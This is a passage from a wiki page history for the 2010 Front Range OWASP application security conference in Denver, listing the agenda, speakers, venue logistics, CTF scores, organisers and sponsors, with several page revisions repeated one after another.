''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&hl=en Presentation]<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&hl=en Presentation]<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications. The winner received a new iPad. Second and third place received an iPod shuffle.<br />
<br />
The team that won the contest consisted of four members of the Denver Defcon group, dc303 (http://dc303.org). This group also plays in the annual Defcon CTF competition (with about 20 other folks from the Denver area). If you are interested in joining them for future CTF competitions (local and abroad), contact mantis1 at gmail.com.<br />
<br />
Second place went to Matthew Rowley (playing on his own)<br />
<br />
Final scores:<br />
{| border="3"<br />
|Rank||Name||Score||Comments<br />
|-<br />
|'''1'''||'''mantis'''||'''4500'''||<br />
|-<br />
|'''2'''||'''Mathew Rowley'''||'''2850'''||'''(wuntee)'''<br />
|-<br />
|'''3'''||'''jgimer'''||'''2300'''||<br />
|-<br />
|4||jsouza||2200||<br />
|-<br />
|5||CSURams||1800||<br />
|-<br />
|6||quincymagoo||1200||<br />
|-<br />
|7||skehoe||700||<br />
|-<br />
|8||jtevans||700||<br />
|-<br />
|9||igctf||700||<br />
|-<br />
|10||kdavis||700||<br />
|}<br />
<br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
[[File:Sponsors.PNG]]<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84416Front Range OWASP Conference 20102010-06-03T21:53:53Z<p>Eduprey: </p>
<hr />
<div>__NOTOC__ <br />
<br />
<!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --><br />
FROC2010 was a major success! If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]<br />
<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
<!-- [http://froc2010.eventbrite.com Registration is now open!] --><br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
<!-- Click [http://froc2010.eventbrite.com HERE] to register now. --><br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&sort=name&layout=list&num=50 Presentation] [http://blip.tv/file/3710067 Video]<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
<br />
[http://blip.tv/file/3710155 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&hl=en Presentation]<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&hl=en Presentation]<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
